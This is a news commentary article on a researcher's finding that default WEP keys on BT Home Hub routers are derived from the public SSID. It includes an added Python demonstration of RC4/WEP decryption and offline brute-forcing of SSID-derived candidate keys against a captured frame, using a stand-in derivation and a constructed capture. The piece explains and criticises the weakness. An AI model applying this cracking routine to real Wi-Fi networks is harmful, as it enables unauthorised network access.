The White Hatters of GNUCITIZEN have come up with a curious Wi-Fi tale – a way has been found to hack the default WEP security key on new BT Home Hub routers.
As old-world as WEP might sound, the Home Hub is still the most popular Internet router in the UK. The clue to the danger lies in the word ‘default’.
Apparently, a researcher has discovered that the default WEP key for every router is computed from the default SSID (the name the router broadcasts). Although the keys are all supposed to differ from hub to hub, the SSID is public (again by default), so once the algorithm gets out anyone with an IQ above 120 can compute the range of possibilities from which the WEP key has been calculated and then write a brute-forcing tool. In fact, the researcher has already done that, and reckons the number of candidate keys that need to be tried before the correct one turns up is as low as 80.
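To see what “as low as 80 keys” means in practice, here is an added example (not GNUCITIZEN’s tool, and not the real Home Hub derivation, which the article does not reproduce). It assumes a stand-in vendor scheme in which a 40-bit WEP key is derived from the public SSID plus one small per-hub unknown with 80 possible values; the SSID format, the derivation, the counter, the IV and the captured frame are all constructed for the demonstration. The WEP part is real: each frame is RC4-encrypted under IV‖key and carries a CRC-32 integrity check value (ICV), so a sniffed frame is enough to test every candidate offline and stop when the ICV verifies.

```python
import hashlib
import zlib

# Assumption: the SSID is public and looks like "BTHomeHub-XXXX".
# The derivation below is a STAND-IN, not the real Home Hub algorithm: it
# models a key that depends only on the SSID plus one small unknown counter.
UNKNOWN_RANGE = 80


def derive_default_key(ssid: str, counter: int) -> bytes:
    """Hypothetical vendor derivation: 5-byte (40-bit) WEP key from SSID + counter."""
    return hashlib.sha1(f"{ssid}:{counter}".encode()).digest()[:5]


def candidate_keys(ssid: str):
    """Everything an attacker does not know is the counter, so the key space
    collapses from 2**40 to UNKNOWN_RANGE candidates."""
    for n in range(UNKNOWN_RANGE):
        yield derive_default_key(ssid, n)


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (the cipher WEP actually uses)."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: (plaintext || CRC32 ICV) XOR RC4(iv || key)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4(iv + key, len(plaintext) + 4)
    return bytes(a ^ b for a, b in zip(plaintext + icv, keystream))


def wep_decrypt(key: bytes, iv: bytes, body: bytes):
    """Return the plaintext if the ICV verifies under this key, else None."""
    keystream = rc4(iv + key, len(body))
    plain = bytes(a ^ b for a, b in zip(body, keystream))
    data, icv = plain[:-4], plain[-4:]
    if zlib.crc32(data).to_bytes(4, "little") == icv:
        return data
    return None


def recover_key(ssid: str, iv: bytes, body: bytes):
    """Offline brute force: try each SSID-derived candidate against one sniffed
    frame. A 32-bit ICV gives a ~2**-32 false-positive chance per candidate; a
    real tool would confirm on a second frame or on the LLC/SNAP header."""
    tries = 0
    for tries, key in enumerate(candidate_keys(ssid), start=1):
        data = wep_decrypt(key, iv, body)
        if data is not None:
            return key, data, tries
    return None, None, tries


# Constructed "capture": the true hub happens to sit at counter 37.
SSID = "BTHomeHub-1A2B"
TRUE_COUNTER = 37
TRUE_KEY = derive_default_key(SSID, TRUE_COUNTER)
CAPTURED_IV = bytes.fromhex("0c3f91")
# Constructed frame body: LLC/SNAP header for IPv4 followed by a dummy payload.
PLAINTEXT = bytes.fromhex("aaaa030000000800") + b"constructed payload"
CAPTURED_BODY = wep_encrypt(TRUE_KEY, CAPTURED_IV, PLAINTEXT)

if __name__ == "__main__":
    key, data, tries = recover_key(SSID, CAPTURED_IV, CAPTURED_BODY)
    print(f"key {key.hex()} recovered after {tries} of {UNKNOWN_RANGE} candidates")
    print(f"decrypted: {data!r}")
```

The point the numbers make: a 40-bit WEP key has about a trillion values, which is slow to search even though WEP itself is broken; a key that is a deterministic function of a broadcast SSID and an 80-way unknown is found in under a second from a single captured data frame, and changing nothing but the SSID does not help, because the attacker sees the new SSID too.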
GNUCITIZEN has been here before with BT’s Home Hub, as readers might remember from the authentication disclosure that laid the wretched boxes of gray plastic low in January.
"We haven't received any official response from the vendor yet. However, it is our professional duty to report to the public any pending vulnerabilities. We also strongly believe that general education is the best form of defence and the only way to prevent the rise of malicious security attacks", GNUCITIZEN said in an official release.
“Oh bother, chaps!” you can almost hear the BT Martlesham engineers exclaiming as they sip from mugs of lukewarm tea or inhale from smoking pipes. Time for some beard trimming. But hold on. In fairness to BT’s Home Hub, most routers come without a default key of any kind. The user is usually talked through the process of setting up a key using WPA/WPA-PSK or, failing that (if other Wi-Fi hardware really, really won’t support it), WEP.
I’m not acquainted with the precise setup for the Home Hub, but it seems unlikely to me that anyone naïve enough to use WEP would also use the default key. They’d change it, and that would make almost no difference anyway because WEP is rubbish. Apparently this key is actually printed on a sticker that comes with the hub - why doesn’t the setup assume the user needs to create their own, you wonder?
The solution to all of this is to mandate an automatic WPA encryption setup routine on every product, something a few vendors have already adopted. No messing with WEP, and no messing with anything labelled ‘default’ ever again. Nothing that could be described as ‘default’ could ever be secure, no matter what encryption system is being used.